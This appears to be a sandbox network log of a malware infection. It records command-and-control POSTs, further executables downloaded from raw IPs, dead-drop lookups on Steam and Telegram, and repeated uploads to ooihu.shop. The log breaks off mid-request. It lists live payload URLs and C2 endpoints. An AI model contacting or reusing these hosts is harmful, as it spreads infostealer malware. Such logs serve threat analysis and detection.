                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • [RU]
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 31
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Tue, 10 Dec 2024 19:49:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • [RU]
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 31
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Tue, 10 Dec 2024 19:49:19 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • [US]
                    DNS
                    dare-curbys.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    dare-curbys.biz
                    IN A
                    Response
                  • [US]
                    DNS
                    print-vexer.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    print-vexer.biz
                    IN A
                    Response
                  • [US]
                    DNS
                    impend-differ.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    impend-differ.biz
                    IN A
                    Response
                  • [US]
                    DNS
                    steamcommunity.com
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    steamcommunity.com
                    IN A
                    Response
                    steamcommunity.com
                    IN A
                    23.214.143.155
                  • [US]
                    DNS
                    64.206.67.172.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    64.206.67.172.in-addr.arpa
                    IN PTR
                    Response
                  • [US]
                    DNS
                    43.113.215.185.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    43.113.215.185.in-addr.arpa
                    IN PTR
                    Response
                  • [GB]
                    GET
                    https://steamcommunity.com/profiles/76561199724331900
                    2g5323.exe
                    Remote address:
                    23.214.143.155:443
                    Request
                    GET /profiles/76561199724331900 HTTP/1.1
                    Connection: Keep-Alive
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Host: steamcommunity.com
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx
                    Content-Type: text/html; charset=UTF-8
                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                    Cache-Control: no-cache
                    Date: Tue, 10 Dec 2024 19:47:23 GMT
                    Content-Length: 35597
                    Connection: keep-alive
                    Set-Cookie: sessionid=f1f9687e2d2bfd788c53af89; Path=/; Secure; SameSite=None
                    Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
                  • [US]
                    DNS
                    155.143.214.23.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    155.143.214.23.in-addr.arpa
                    IN PTR
                    Response
                    155.143.214.23.in-addr.arpa
                    IN PTR
                    a23-214-143-155.deploy.static.akamaitechnologies.com
                  • [RU]
                    GET
                    http://31.41.244.11/files/6904700471/Z9Pp9pM.exe
                    skotes.exe
                    Remote address:
                    31.41.244.11:80
                    Request
                    GET /files/6904700471/Z9Pp9pM.exe HTTP/1.1
                    Host: 31.41.244.11
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Tue, 10 Dec 2024 19:47:25 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 2660864
                    Last-Modified: Tue, 10 Dec 2024 07:14:45 GMT
                    Connection: keep-alive
                    ETag: "6757ea65-289a00"
                    Accept-Ranges: bytes
                  • [RU]
                    GET
                    http://31.41.244.11/files/1521297942/H3tyh96.exe
                    skotes.exe
                    Remote address:
                    31.41.244.11:80
                    Request
                    GET /files/1521297942/H3tyh96.exe HTTP/1.1
                    Host: 31.41.244.11
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Tue, 10 Dec 2024 19:47:41 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 1765888
                    Last-Modified: Tue, 10 Dec 2024 09:46:58 GMT
                    Connection: keep-alive
                    ETag: "67580e12-1af200"
                    Accept-Ranges: bytes
                  • [RU]
                    GET
                    http://31.41.244.11/files/8049824649/yiklfON.exe
                    skotes.exe
                    Remote address:
                    31.41.244.11:80
                    Request
                    GET /files/8049824649/yiklfON.exe HTTP/1.1
                    Host: 31.41.244.11
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Tue, 10 Dec 2024 19:47:49 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 7736832
                    Last-Modified: Tue, 10 Dec 2024 17:03:36 GMT
                    Connection: keep-alive
                    ETag: "67587468-760e00"
                    Accept-Ranges: bytes
                  • [RU]
                    GET
                    http://31.41.244.11/files/523681048/3EUEYgl.exe
                    skotes.exe
                    Remote address:
                    31.41.244.11:80
                    Request
                    GET /files/523681048/3EUEYgl.exe HTTP/1.1
                    Host: 31.41.244.11
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Tue, 10 Dec 2024 19:48:34 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 1850880
                    Last-Modified: Tue, 10 Dec 2024 17:55:01 GMT
                    Connection: keep-alive
                    ETag: "67588075-1c3e00"
                    Accept-Ranges: bytes
                  • [RU]
                    GET
                    http://31.41.244.11/files/unique2/random.exe
                    skotes.exe
                    Remote address:
                    31.41.244.11:80
                    Request
                    GET /files/unique2/random.exe HTTP/1.1
                    Host: 31.41.244.11
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Tue, 10 Dec 2024 19:48:51 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 2012672
                    Last-Modified: Tue, 10 Dec 2024 17:32:14 GMT
                    Connection: keep-alive
                    ETag: "67587b1e-1eb600"
                    Accept-Ranges: bytes
                  • [US]
                    DNS
                    11.244.41.31.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    11.244.41.31.in-addr.arpa
                    IN PTR
                    Response
                  • [RU]
                    GET
                    http://185.215.113.206/
                    3d69R.exe
                    Remote address:
                    185.215.113.206:80
                    Request
                    GET / HTTP/1.1
                    Host: 185.215.113.206
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:47:25 GMT
                    Server: Apache/2.4.41 (Ubuntu)
                    Content-Length: 0
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • [RU]
                    POST
                    http://185.215.113.206/c4becf79229cb002.php
                    3d69R.exe
                    Remote address:
                    185.215.113.206:80
                    Request
                    POST /c4becf79229cb002.php HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----DHDAFBFCFHIDAKFIIEBA
                    Host: 185.215.113.206
                    Content-Length: 211
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:47:25 GMT
                    Server: Apache/2.4.41 (Ubuntu)
                    Content-Length: 8
                    Keep-Alive: timeout=5, max=99
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • [US]
                    DNS
                    206.113.215.185.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    206.113.215.185.in-addr.arpa
                    IN PTR
                    Response
                  • [US]
                    DNS
                    232.168.11.51.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    232.168.11.51.in-addr.arpa
                    IN PTR
                    Response
                  • [US]
                    DNS
                    97.17.167.52.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    97.17.167.52.in-addr.arpa
                    IN PTR
                    Response
                  • [US]
                    DNS
                    197.87.175.4.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    197.87.175.4.in-addr.arpa
                    IN PTR
                    Response
                  • [US]
                    DNS
                    10.109.209.205.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    10.109.209.205.in-addr.arpa
                    IN PTR
                    Response
                  • [US]
                    DNS
                    18.31.95.13.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    18.31.95.13.in-addr.arpa
                    IN PTR
                    Response
                  • [US]
                    DNS
                    134.130.81.91.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    134.130.81.91.in-addr.arpa
                    IN PTR
                    Response
                  • [US]
                    DNS
                    89.210.23.2.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    89.210.23.2.in-addr.arpa
                    IN PTR
                    Response
                    89.210.23.2.in-addr.arpa
                    IN PTR
                    a2-23-210-89.deploy.static.akamaitechnologies.com
                  • [US]
                    DNS
                    fightlsoser.click
                    Z9Pp9pM.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    fightlsoser.click
                    IN A
                    Response
                    fightlsoser.click
                    IN A
                    172.67.213.48
                    fightlsoser.click
                    IN A
                    104.21.35.43
                  • [US]
                    POST
                    https://fightlsoser.click/api
                    Z9Pp9pM.exe
                    Remote address:
                    172.67.213.48:443
                    Request
                    POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 8
                    Host: fightlsoser.click
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:47:56 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Set-Cookie: PHPSESSID=p4hqktjst4d198821698pgdapd; expires=Sat, 05-Apr-2025 13:34:35 GMT; Max-Age=9999999; path=/
                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                    Cache-Control: no-store, no-cache, must-revalidate
                    Pragma: no-cache
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r0CFNuLN%2BxDQxesWJMs1h4iZtmfh95wDxscLdTdUiT%2Bv1QFoWBfDC0a3JtPk1q3TbQI6Lo8gbxTSB4qRzSUgDXQiypeYYc3PfGm6VsC2m0LqUR27Wosdk7NoZVS5vTP5AmIPHA%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8effbfe1eedaef39-LHR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=52300&min_rtt=47504&rtt_var=19128&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3301&recv_bytes=607&delivery_rate=74165&cwnd=236&unsent_bytes=0&cid=3a3bab4a226740da&ts=1287&x=0"
                  • [US]
                    DNS
                    se-blurry.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    se-blurry.biz
                    IN A
                    Response
                  • [US]
                    DNS
                    se-blurry.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    se-blurry.biz
                    IN A
                  • [US]
                    DNS
                    48.213.67.172.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    48.213.67.172.in-addr.arpa
                    IN PTR
                    Response
                  • [US]
                    DNS
                    zinc-sneark.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    zinc-sneark.biz
                    IN A
                    Response
                  • [US]
                    DNS
                    dwell-exclaim.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    dwell-exclaim.biz
                    IN A
                    Response
                  • [US]
                    DNS
                    formy-spill.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    formy-spill.biz
                    IN A
                    Response
                  • [US]
                    POST
                    https://covery-mover.biz/api
                    Z9Pp9pM.exe
                    Remote address:
                    172.67.206.64:443
                    Request
                    POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 8
                    Host: covery-mover.biz
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:47:58 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Set-Cookie: PHPSESSID=44h1o4ib6tuja1n4m60t2kn9no; expires=Sat, 05-Apr-2025 13:34:37 GMT; Max-Age=9999999; path=/
                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                    Cache-Control: no-store, no-cache, must-revalidate
                    Pragma: no-cache
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=004%2BYGZem%2Fl4qkDPy6P05SWdoJkf2gRTcJoNdKfzBAhxVw5LxHGP8JAkDT7r96ZxwBnn5T2Ck3MldIbMMjss%2BlWih4ip0jdXHNwZqUvjszbbHbMYdxoyeiyfzRBgnxi1PKrB"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8effbff478bc9f64-AMS
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=58044&min_rtt=57559&rtt_var=17116&sent=9&recv=8&lost=0&retrans=1&sent_bytes=3558&recv_bytes=605&delivery_rate=66902&cwnd=253&unsent_bytes=0&cid=27dd95a50b1324f0&ts=593&x=0"
                  • [US]
                    DNS
                    dare-curbys.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    dare-curbys.biz
                    IN A
                    Response
                  • [US]
                    DNS
                    print-vexer.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    print-vexer.biz
                    IN A
                    Response
                  • [US]
                    DNS
                    impend-differ.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    impend-differ.biz
                    IN A
                    Response
                  • [US]
                    DNS
                    steamcommunity.com
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    steamcommunity.com
                    IN A
                    Response
                    steamcommunity.com
                    IN A
                    23.214.143.155
                  • [GB]
                    GET
                    https://steamcommunity.com/profiles/76561199724331900
                    Z9Pp9pM.exe
                    Remote address:
                    23.214.143.155:443
                    Request
                    GET /profiles/76561199724331900 HTTP/1.1
                    Connection: Keep-Alive
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Host: steamcommunity.com
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx
                    Content-Type: text/html; charset=UTF-8
                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                    Cache-Control: no-cache
                    Date: Tue, 10 Dec 2024 19:47:59 GMT
                    Content-Length: 35597
                    Connection: keep-alive
                    Set-Cookie: sessionid=e0638d04927c44b7f6264257; Path=/; Secure; SameSite=None
                    Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
                  • [US]
                    DNS
                    78.210.23.2.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    78.210.23.2.in-addr.arpa
                    IN PTR
                    Response
                    78.210.23.2.in-addr.arpa
                    IN PTR
a2-23-210-78.deploy.static.akamaitechnologies.com
                  • flag-us
                    DNS
                    t.me
                    3EUEYgl.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    t.me
                    IN A
                    Response
                    t.me
                    IN A
                    149.154.167.99
                  • flag-nl
                    GET
                    https://t.me/detct0r
                    3EUEYgl.exe
                    Remote address:
                    149.154.167.99:443
                    Request
                    GET /detct0r HTTP/1.1
                    Host: t.me
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0
                    Date: Tue, 10 Dec 2024 19:48:50 GMT
                    Content-Type: text/html; charset=utf-8
                    Content-Length: 12313
                    Connection: keep-alive
                    Set-Cookie: stel_ssid=c3ec1a80f38d5c744e_57915136407261548; expires=Wed, 11 Dec 2024 19:48:50 GMT; path=/; samesite=None; secure; HttpOnly
                    Pragma: no-cache
                    Cache-control: no-store
                    X-Frame-Options: ALLOW-FROM https://web.telegram.org
                    Content-Security-Policy: frame-ancestors https://web.telegram.org
                    Strict-Transport-Security: max-age=35768000
                  • flag-us
                    DNS
                    ooihu.shop
                    3EUEYgl.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    ooihu.shop
                    IN A
                    Response
                    ooihu.shop
                    IN A
                    116.203.10.31
                  • flag-us
                    DNS
                    ooihu.shop
                    3EUEYgl.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    ooihu.shop
                    IN A
                    Response
                    ooihu.shop
                    IN A
                    116.203.10.31
                  • flag-de
                    GET
                    https://ooihu.shop/
                    3EUEYgl.exe
                    Remote address:
                    116.203.10.31:443
                    Request
                    GET / HTTP/1.1
                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                    Host: ooihu.shop
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx
                    Date: Tue, 10 Dec 2024 19:48:51 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-us
                    DNS
                    99.167.154.149.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    99.167.154.149.in-addr.arpa
                    IN PTR
                    Response
                  • flag-de
                    POST
                    https://ooihu.shop/
                    3EUEYgl.exe
                    Remote address:
                    116.203.10.31:443
                    Request
                    POST / HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----4W4OPHD2DTRIM790ZMG4
                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                    Host: ooihu.shop
                    Content-Length: 256
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx
                    Date: Tue, 10 Dec 2024 19:48:51 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-us
                    DNS
                    70.209.201.84.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    70.209.201.84.in-addr.arpa
                    IN PTR
                    Response
                  • flag-us
                    DNS
                    31.10.203.116.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    31.10.203.116.in-addr.arpa
                    IN PTR
                    Response
                    31.10.203.116.in-addr.arpa
                    IN PTR
static.31.10.203.116.clients.your-server.de
                  • flag-de
                    POST
                    https://ooihu.shop/
                    3EUEYgl.exe
                    Remote address:
                    116.203.10.31:443
                    Request
                    POST / HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----K6FKFCT00ZU3E37900RQ
                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                    Host: ooihu.shop
                    Content-Length: 299
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx
                    Date: Tue, 10 Dec 2024 19:48:52 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-us
                    DNS
                    e6.o.lencr.org
                    3EUEYgl.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    e6.o.lencr.org
                    IN A
                    Response
                    e6.o.lencr.org
                    IN CNAME
                    o.lencr.edgesuite.net
                    o.lencr.edgesuite.net
                    IN CNAME
                    a1887.dscq.akamai.net
                    a1887.dscq.akamai.net
                    IN A
                    88.221.135.115
                    a1887.dscq.akamai.net
                    IN A
                    88.221.135.106
                    a1887.dscq.akamai.net
                    IN A
                    88.221.134.115
                    a1887.dscq.akamai.net
                    IN A
                    88.221.135.113
                    a1887.dscq.akamai.net
                    IN A
                    88.221.135.97
                    a1887.dscq.akamai.net
                    IN A
                    88.221.135.114
                  • flag-us
                    DNS
                    e6.o.lencr.org
                    3EUEYgl.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    e6.o.lencr.org
                    IN A
                    Response
                    e6.o.lencr.org
                    IN CNAME
                    o.lencr.edgesuite.net
                    o.lencr.edgesuite.net
                    IN CNAME
                    a1887.dscq.akamai.net
                    a1887.dscq.akamai.net
                    IN A
                    88.221.135.115
                    a1887.dscq.akamai.net
                    IN A
                    88.221.135.97
                    a1887.dscq.akamai.net
                    IN A
                    88.221.135.106
                    a1887.dscq.akamai.net
                    IN A
                    88.221.135.114
                    a1887.dscq.akamai.net
                    IN A
                    88.221.134.115
                    a1887.dscq.akamai.net
                    IN A
                    88.221.135.113
                  • flag-gb
                    GET
                    http://e6.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBTUejiAQejpjQc4fOz2ttjyD6VkMQQUDcXM%2FZvuFAWhTDCCpT5eisNYCdICEgP4k%2Bk5CwN3hyog%2B%2FDYppS8vw%3D%3D
                    3EUEYgl.exe
                    Remote address:
                    88.221.135.115:80
                    Request
                    GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBTUejiAQejpjQc4fOz2ttjyD6VkMQQUDcXM%2FZvuFAWhTDCCpT5eisNYCdICEgP4k%2Bk5CwN3hyog%2B%2FDYppS8vw%3D%3D HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Microsoft-CryptoAPI/10.0
                    Host: e6.o.lencr.org
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx
                    Content-Type: application/ocsp-response
                    Content-Length: 345
                    ETag: "4A8B461D7D0867B834B6B3D97F9425BE3F43D6D6DD06929C18B94181B0AAE0B3"
                    Last-Modified: Tue, 10 Dec 2024 01:01:00 UTC
                    Cache-Control: public, no-transform, must-revalidate, max-age=16439
                    Expires: Wed, 11 Dec 2024 00:22:51 GMT
                    Date: Tue, 10 Dec 2024 19:48:52 GMT
                    Connection: keep-alive
                  • flag-us
                    DNS
                    21.236.111.52.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    21.236.111.52.in-addr.arpa
                    IN PTR
                    Response
                  • flag-us
                    DNS
                    61.45.26.184.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    61.45.26.184.in-addr.arpa
                    IN PTR
                    Response
                    61.45.26.184.in-addr.arpa
                    IN PTR
a184-26-45-61.deploy.static.akamaitechnologies.com
                  • flag-us
                    DNS
                    115.135.221.88.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    115.135.221.88.in-addr.arpa
                    IN PTR
                    Response
                    115.135.221.88.in-addr.arpa
                    IN PTR
a88-221-135-115.deploy.static.akamaitechnologies.com
                  • flag-de
                    POST
                    https://ooihu.shop/
                    3EUEYgl.exe
                    Remote address:
                    116.203.10.31:443
                    Request
                    POST / HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----K6FKFCT00ZU3E37900RQ
                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                    Host: ooihu.shop
                    Content-Length: 299
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx
                    Date: Tue, 10 Dec 2024 19:48:54 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-de
                    POST
                    https://ooihu.shop/
                    3EUEYgl.exe
                    Remote address:
                    116.203.10.31:443
                    Request
                    POST / HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----R1DBSJMYMYM7QI5FCJM7
                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                    Host: ooihu.shop
                    Content-Length: 300
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx
                    Date: Tue, 10 Dec 2024 19:48:55 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-de
                    POST
                    https://ooihu.shop/
                    3EUEYgl.exe
                    Remote address:
                    116.203.10.31:443
                    Request
                    POST / HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----SJWT2DT2NGVAAAIEUSR1
                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                    Host: ooihu.shop
                    Content-Length: 299
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx
                    Date: Tue, 10 Dec 2024 19:48:55 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-de
                    POST
                    https://ooihu.shop/
                    3EUEYgl.exe
                    Remote address:
                    116.203.10.31:443
                    Request
                    POST / HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----HVKNYUK6F37YM79RQ9R9
                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                    Host: ooihu.shop
                    Content-Length: 299
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx
                    Date: Tue, 10 Dec 2024 19:48:56 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-de
                    POST
                    https://ooihu.shop/
                    3EUEYgl.exe
                    Remote address:
                    116.203.10.31:443
                    Request
                    POST / HTTP/1.1
